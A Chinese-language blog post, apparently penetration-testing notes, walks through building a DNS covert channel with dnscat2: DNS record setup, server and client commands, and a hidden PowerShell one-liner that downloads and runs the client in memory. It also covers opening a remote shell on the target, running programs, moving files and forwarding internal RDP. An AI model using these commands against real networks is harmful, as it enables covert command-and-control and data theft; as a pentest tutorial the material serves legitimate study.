【渗透测试笔记】之【内网渗透——应用层隧道(DNS隧道:dnscat2的使用(域名连接、直连、powershell连接))】

最新推荐文章于 2023-12-18 08:49:19 发布
最新推荐文章于 2023-12-18 08:49:19 发布
阅读量2.1k 收藏 7
点赞数 3
分类专栏: 渗透测试 隐秘通信隧道技术 内网渗透 文章标签: 网络安全 隧道通信 内网渗透 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/120966897
版权

文章目录

1 服务器端环境部署

1.1 部署域名解析

如果要通过域名的方式访问那么久必须部署域名解析,直连方式则跳过此步骤。

1.1.1 创建A记录

创建一个A记录,ns1.xxx.xxx指向vps ip地址。
在这里插入图片描述
查看是否生效:
在这里插入图片描述

1.1.2 创建NS记录

创建一个NS记录dnstunnel.xxx.xxx指向ns1.xxx.xxx。
在这里插入图片描述

1.2 安装dnscat2服务器

在vps部署dnscat2服务器:

apt-get install gem ruby-dev libpq-dev ruby-bundler git -y
# 安装相关依赖

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install
# 安装dnscat2

在这里插入图片描述

1.3 启动服务器

有两种方式,一直是通过域名访问方式。另一种为直连方式,即直接访问ip。

1.3.1 域名连接方式

ruby dnscat2.rb dnstunnel.xxx.xxx -e open -c aa8j --no-cache

-e  :规定安全级别。open表示允许客户端不加密。
-c  :连接密码
--no-cache  :禁止缓存

在这里插入图片描述

1.3.2 直连方式

ruby dnscat2.rb --dns server=127.0.0.1,port=53,type=TXT --script=aa8j

port  :指定vps侦听端口
script  :指定连接密码

2 客户端部署

2.1 安装dnscat2客户端

如果是Linux:

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make

如果是windows:
下载链接:https://downloads.skullsecurity.org/dnscat2/

2.2 连接服务器

2.2.1 访问测试及错误处理

首先测试是否能成功访问:

./dnscat --ping dnstunnel.xxx.xxx

在这里插入图片描述
在这里插入图片描述

注意,如果遇到如以下[[ ERROR ]] :: DNS: RCODE_SERVER_FAILURE的情况:
在这里插入图片描述
先尝试清空dns缓存或更换dns服务器等方式,让nslookup域名解析到正确地址:

nslookup ns1.xxx.xxx

在这里插入图片描述

2.2.2 域名连接方式

Linux下:

./dnscat --dns domain=dnstunnel.xxx.xxx --secret aa8j

看到返回Session established!字样代表成功创建了session。
在这里插入图片描述
此时来到服务器上,也会看到成功创建的session号为1:
在这里插入图片描述
windows下同理:
在这里插入图片描述
在这里插入图片描述

2.2.3 直连方式

./dnscat --dns server=<vps_ip_address>,port=53,type=TXT --secret=aa8j

效果一样,不再演示。

2.2.4 powershell连接

在windows下还可以使用powershell连接,脚本下载地址:https://github.com/AA8j/SecTools/tree/main/dnscat2

方式一:导入方式

Import-Module .\dnscat2.ps1
start-Dnscat2 -Domain dnstunnel.xxx.xxx -DNSServer 8.8.8.8

方式二:内存加载方式

powershell.exe -nop -w hidden-c {IEX(New-Object System.Net.Webclient).Downloading('https://raw.githubusercontent.com/AA8j/SecTools/main/dnscat2/dnscat2.ps1');Start-Dnscat2 -Domain dnstunnel.xxx.xxx -DNSServer 8.8.8.8}

2.3 服务端常用命令

客户端连接后使用sessions 查看所有已经连接的session:
在这里插入图片描述
使用session -i 1指定进入哪个session,这里进入session 1:
在这里插入图片描述
进入session后,使用help查看session里可以使用的命令:
在这里插入图片描述
从上到下依次是:

clear			:清屏
delay			:修改远程响应延时
exec			:执行指定程序
shell			:获得一个交互shell,会生成一个新的session,进入后ctrl+z退出
download/upload	:上传下载文件(速度很慢)
suspend			:返回上一层(效果同ctrl+z)
listen			:本地端口转发,如listen 0.0.0.0:3388 10.1.1.10:3389(将内网10.1.1.10的3389端口转发到vps的3388端口)
ping			:确认目标机器是否在线(返回pong即在线)
shutdown		:切断当前会话
quit			:退出dnscat2
kill <id>		:结束某个session
set				:设置值。如set security=open
sessions		:列出所有session
session -i <id>	:进入某个session

2.3.1 获取一个shell

进入一个session后,直接输入shell,就会在后台生成一个新的session,这个新的session即为目标的交互式shell:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.3.2 打开一个程序

输入exec notepad.exe会打开记事本:
在这里插入图片描述
在这里插入图片描述

AA8j
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
络安全内渗透DNS隧道实验--dnscat2连模式_内 dnscat2隧道使用
2401_83740129的博客
04-21 675
DNS协议的角度看,这样的操作只是在一次次地查询某个特定的域名并得到解析结果,但其本质问题是,预期的返回结果应该是一个IP地址,而事实上不是–返回的可以是任意字符串,包括加密的C&C指令。如果内放行所有的DNS请求,dnscat2会使用连模式,通过UDP的53端口进行通信(不需要域名,速度快,而且看上去仍然像普通的DNS查询)。如果内中的请求仅限于白名单服务器或者特定的域,dnscat2会使用中继模式来申请一个域名,并将运行dnscat2服务端的服务器指定为受信任的DNS服务器。
dnscat2-powershelldnscat2的Powershell客户端,加密的DNS命令和控制工具
02-06
渗透测试中,安全专家使用dnscat2-powershell来模拟攻击,找出络防御的弱点。通过这种方式,组织能够识别并修复潜在的安全漏洞,提高整体的安全态势。 **标签解析** "security":强调该工具涉及络安全,尤其...
dns2tcp 官方最新版 + 可用的客户端(DNS隧道转发TCP连接的工具).rar
10-09
dns2tcp 官方最新版 + 可用的客户端(DNS隧道转发TCP连接的工具).rar
dnscat2搭建dns隧道
weixin_44110913的博客
03-06 1594
域名购买站:https://dcc.godaddy.com/ 购买域名,并且注册站,应用该模块 安装服务端: apt-get install gem apt-get install ruby-dev apt-get install libpq-dev cd dnscat2/server git clone https://github.com/iagox86/dnscat2.git 编译 bundle install 中继模式启动服务端 sudo ruby ./dnscat2.rb vpn.xxx -e
centos查看dns缓存_dnscat2搭建dns隧道
weixin_33279929的博客
01-01 663
说明dnscat2可用来搭建dns隧道。地址:https://github.com/iagox86/dnscat2。分为客户端和服务端,客户端运行在受害机,服务端运行在攻击机。dns隧道分为两种,一种是连模式,就是dns通信受害机连接自己的服务器。另外一种就是非连的(也叫中继模式),受害机会先去请求互联上的dns服务器,最后再指向指定的服务器(也就是自己攻击机)。区别在于连模...
DNS隧道工具』— dnscat2
热门推荐
localhost01
01-22 1万+
一、入坑必读 1、简介 Dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包括:文件上传、下载、反弹Shell…… 使用热度: ★★★★☆ 2、专业词 主控机:黑客方 被控机:受害者 Type:DNS解析的类型,常见的有:A、CNAME、MX、TXT…… 3、放哪儿 主控机 被控机 ......
【工具使用应用DNS协议工具---dnscat2
做自己喜欢的事,并将其发挥到极致!
12-15 3037
0x01 DNS介绍 DNS域名系统(Domain Name System)的缩写,是因特的一项核心服务,它作为可以将域名和IP地址相互映射的一个分布式数据库,能够使人更方便的访问互联,而不用去记住能够被机器接读取的IP数串。 DNS的记录类型有很多,有 A,AAAA,CNAME,MX,SOA,NS 等; DNS的解析过程可以分为两种类型:迭代查询和递归查询。通常本机到Local DNS Server的过程属于递归查询,而Local DNS Server对查询域名的解析过程属于迭代查询。为了减轻L
批处理/powershell脚本连接局域打印机,并设置为默认打印机
01-13
1、采用批处理/powershell脚本的方式连接络打印机 2、适用于公司很多打印机的场景,需要管理员经常手动去处理打印机连接的问题 3、脚本可根据不同的打印机IP待弹窗弹出后手动填入即可 4、脚本示例为佳能lbp232型号...
POWERSHELL_内渗透实例.pdf
08-07
目录 1.POWERSHELL简介 2.POWERSPLOIT 3.内渗透实例
PowerShell小技巧之启动远程桌面连接
01-20
先启用远程连接: (gwmi -class win32_terminalservicesetting -namespace root\cimv2\terminalservices).setallowtsconnections(1) 然后再启用几条防火墙规则即可,用PowerShell(需要管理员权限)更显其威武: ...
001.PDF.渗透技巧——获得Powershell命令的历史记录–3gstudent1
08-03
【标题】:渗透技巧——获取PowerShell命令的历史记录 【描述】:本文主要探讨了如何在渗透测试中获取PowerShell命令的历史记录,包括利用不同方法导出历史记录,并提出相应的防御建议。文中还提到了查看cmd.exe...
dns2tcp 官方最新版 + 可用的客户端(DNS隧道转发TCP连接的工具)
04-13
dns2tcp 官方最新版 + 可用的客户端(DNS隧道转发TCP连接的工具)。 dns2tcp 是一个利用DNS隧道转发TCP连接的工具,使用C语言开发。它分为两个部分,服务端和客户端,服务端运行在linux服务器上,客户端可以运行在linux和windows上(其他平台没有测试过),编译完成后在服务端上的可执行文件名称为dns2tcpd,在客户端(linux)上的名称为dns2tcpc,kali默认安装了二者。 dns2tcp 官方最新版 dns隧道
dns隧道dnscat2(无域名操作)
来到了学渣的博客
06-10 1724
如果主机可以解析域名,或者通过ping来指向IP,那么也可以尝试通过DNS协议传输内部的通信。 先留个坑,因为没有域名所以用ip作为实验,知道操作的一个过程,后面继续完善 环境准备 server端(攻击端ip:192.168.10.144): root@kali:~# apt-get update root@kali:~# apt-get -y install ruby-dev git make g++ root@kali:~# gem install bundler root@kali:~# git c
渗透笔记
qq_32812063的博客
11-28 846
安全笔记
基于dnscat2的DNS隧道研究
ailx10
05-06 742
最近准备研究一下DNS隧道上的案例比较多,总的来说都需要花钱,毕竟域名+vps服务器,都是真金白银,为了做这个实验,我也是花了200块钱。一般来说,dns隧道有2种:连和迭代。连的dns隧道,就是你自己要有一台外dns服务器,比如基于bind9搭建一个dns服务器,这种模式容易造成C&C(DNS)服务器的地址泄漏,现在基本上没人用了。迭代模式,可以依靠任意一台dns服务,然后依靠...
渗透测试笔记下载YYDS
网络研究观
08-02 9999
来源于络、回馈于络、各位师傅如果觉得有用请自取、文末有获取方式; 也不知道当初为啥选择了互联这个行业,技术范围涉及的太广,走的挺艰难的,每天都在学习各种技术和知识,学的单调了找不到工作,学的范围大了反而啥都不精 分享一波亮神写的文章,pdf来源于络。包含渗透技术、工具使用、后渗透,总之很强~很适合渗透大神。 亮神永远的神-“学习的最高境界在于分享” “因为文章涉及到敏感的攻击行为,所以好多需要打马赛克,或者是本地以demo的形式表现出来。当这个行业做久了,你也终有一天
渗透小工具(附下载地址)
leah126的博客
12-18 409
内容概要:包括 内、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
DNS隧道的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 2577
DNS tunnel的利用
整理了一套很棒的渗透测试笔记合集,建议收藏!
ZL_1618的博客
09-24 127
渗透测试是指从内、外络环境中,利用各种手段对某个特定络进行模拟攻击,目的是为了寻找可能被利用的漏洞,是企业中重要的一环、虽然大多数人在学习后都能快速上手,但渗透测试还是有一定的门槛,今天就给大家分享一套,包括。
读书笔记之红蓝对抗解密渗透测试络安全建设.docx
最新发布
03-27
读书笔记之红蓝对抗解密渗透测试络安全建设.docx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值